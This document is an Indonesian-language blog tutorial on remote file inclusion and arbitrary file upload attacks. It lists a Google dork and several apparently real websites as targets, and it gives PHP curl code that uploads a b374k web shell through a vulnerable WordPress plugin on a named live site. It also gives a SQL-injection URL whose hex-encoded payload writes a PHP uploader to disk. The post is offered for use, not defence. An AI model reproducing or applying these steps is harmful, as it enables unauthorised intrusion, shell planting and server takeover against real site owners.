Lompat ke konten Lompat ke sidebar Lompat ke footer

Tutorial Lengkap RFI Attack.

Nekell404 - Remote file inclusion dapat diartikan sebagai penyisipan sebuah file dari luar suatu file dalam sebuah webserver dengan tujuan script didalam akan dieksekusi pada saat file yang disisipi di-load. Tehnik ini sendiri mengharuskan webserver yang bersangkutan mampu menjalankan server side scripting (PHP, ASP, etc) serta file yang disisipi dibuat menggunakan bahasa script tersebut. Target remote file inclusion biasanya berbentuk sebuah portal atau content management system (CMS) sehingga banyak sekali jumlah website yang rawan terhadap serangan tipe ini.

Sebuah serangan file inclusion terjadi didasarkan pada kesalahan atau ketidaksengajaan pendeklarasian variabel-variabel dalam sebuah file. Sebuah variabel yang tidak dideklarasikan atau didefinisikan secara benar dapat di eksploitasi.

File inclusion memiliki level resiko tinggi (High Risk) bahkan level sangat berbahaya (Very Dangerous) karena injeksi memperkenankan pelakunya untuk melakukan eksekusi perintah jarak jauh (Remote Commands Execution) terhadap server. Tindakan ini sangat membahayakan bagi sebuah server jika pelakunya mencoba untuk mendapatkan hak akses lebih tinggi dengan cara melakukan eksploitasi lokal, sehingga bisa saja pelaku mendapatkan akses administrator atau root.

Secara garis besar resiko serangan ini adalah:

1. Web root folder / subdirectory defacing.
2. Previledge escalation (mendapatkan hak akses lebih tinggi).
3. Menjalankan proses dalam server (psyBNC, bots, dsb)
4. Pilfering a.k.a pencurian data (such as credentials information, credit cards, dll..)
5. Dan banyak lagi…!!! Termasuk tindakan pengambilalihan server dan DDoS.

Ok…sekarang kita lanjut ke TKP :

Di sini kita akan menggunakan dork dari om google untuk mendapatkan target kita, dorknya adalah :

inurl: /editor/filemanager/ site: com

Kemudian kita pilih target yang dianggap bisa kita eksploitasi bugs RFInya. Jadi dalam cara ini kita menggunakan bugs yang dimiliki oleh fckeditor, yakni sebuah plugin dalam CMS yang bertugas sebagai editor penulisan teks dalam web. Contoh target yang bisa kita manfaatkan adalah :

http://www.cuttingedgebiblestudy.com/cart/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

http://www.makeapagescrapbooking.com.au/cart/upload/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

http://www.mvuschool.org/store/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

http://www.lifegevity.com/cart/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

http://chinalacewigstore.com/store/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html


http://www.sman1gombong.sch.id/editor/filemanager/connectors/test.html

http://www.sman1kotabaru.sch.id/editor/filemanager/connectors/uploadtest.html


Kita buka salah satu target misalkan :

Kita buka salah satu target misalkan :


http://www.cuttingedgebiblestudy.com/cart/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html


Kemudian di kolom isian Connector kita rubah menjadi PHP dan silahkan memilih file untuk di upload, jika sudah silahkan tekan upload. Akan muncul pesan yang berbunyi “File Uploaded With No Errors” berarti file telah sukses terupload dan silahkan menjalankan URL sebagai berikut untuk melihat hasilnya :


http://www.cuttingedgebiblestudy.com/testingrfi.txt


Ok…pada kasus kedua ini kita akan melakukan RFI yang biasa kita sebut “Arbitrary file uploading” dengan memanfaatkan bugs di wordpress pada plugin wpstorecart. Untuk cara ini kita membutuhkan sebuah web server yang support PHP dan CURL, di sini saya menggunakan web server milik saya di :


http://www.lifedeary.com/h4ckld/


Kita buat sebuah file yang akan kita taruh dalam web server tadi :


—> -rfi_afu.php


<?php

$uploadfile=”b374kmj.php”;

$ch =

curl_init(“http://totalprintersolutions.com/eshop/wp-content/plugins/wpstorecart/php/upload.php&#8221;);

curl_setopt($ch, CURLOPT_POST, true);

curl_setopt($ch, CURLOPT_POSTFIELDS,

array(‘Filedata’=>”@$uploadfile”));

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

$postResult = curl_exec($ch);

curl_close($ch);

print “$postResult”;

?>

Kemudian kita letakkan juga file shell kita di dalam web server tadi, di sini saya menggunakan b374k Mini Jumping Edition. Setelah semua persyaratan terpenuhi, sekarang kita tinggal menjalankan url di browser sebagai berikut :


http://www.lifedeary.com/h4ckld/rfi_afu.php


Tunggu sampai loadingnya berakhir dan shell kita sudah tertanam di direktori web target. happy jumping dech…!!!


http://totalprintersolutions.com/eshop/wp-content/uploads/wpstorecart/b374kmj.php


Sebagai bonus saya akan memaparkan sebuah bugs pada phpmyadmin yang dapat diinjek dengan RCE sehingga menghasilkan bugs RFI dan akhirnya merebut server target dengan shell b374k yang sudah tertanam di tubuh server.

1. Sebagai target saya menggunakan localhost dan CMS Lokomedia versi terbaru yaitu 1.5.7 yang tetap menghadirkan bugs SQL Injection pada file zoom.php


2. Kita langsung mencari column dan angka ajaib untuk kita masukkan kode RCEnya. Untuk tutorial SQL Injectionnya kita sudah bahas pada modul sebelumnya, mari kita temukan bersama-sama.


http://localhost/lokomedia/zoom.php?id=3

http://localhost/lokomedia/zoom.php?id=’union+all+select+1,2,3,4,5,6&#8211; 3

http://localhost/lokomedia/zoom.php?id=’union+all+select+1,2,3,4,5,@@version&#8211; 3


3. Ok…kita mendapatkan jumlah column sebanyak 6 dan angka ajaibnya yaitu 6 juga. Lanjut dengan memasukkan kode RCE seperti pada kasus 3 tadi, cuma dalam kasus ini kata select dihilangkan sehingga menjadi :


http://localhost/lokomedia/zoom.php?id=’union+all+select+1,2,3,4,5,0x3c3f706870206563686f20223c666f726d206d6574686f643d27504f53542720656e63747970653d276d756c7469706172742f666f726d2d64617461273e3c696e70757420747970653d2766696c6527206e616d653d2766696c656c65272073697a653d273434273e3c696e70757420747970653d277375626d6974273e3c2f666f726d3e223b40636f707928245f46494c45535b2766696c656c65275d5b27746d705f6e616d65275d2c245f46494c45535b2766696c656c65275d5b276e616d65275d293b3f3e into outfile ‘d:/wamp/www/upload.php’– 3


4. Setelah dijalankan akan ada tulisan :


“Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in D:\wamp\www\lokomedia\zoom.php on line 5”


Tulisan ini biarpun berbau error tapi sebenarnya kita telah berhasil membuat file upload.php yang bisa kita akses di URL :


http://localhost/upload.php


5. Sekarang celah RFI sudah terbentuk, silahkan mengupload shell kesayangan kita.


#Happy Hacking



arm rayong Kamu Nanyea?

Posting Komentar untuk "Tutorial Lengkap RFI Attack."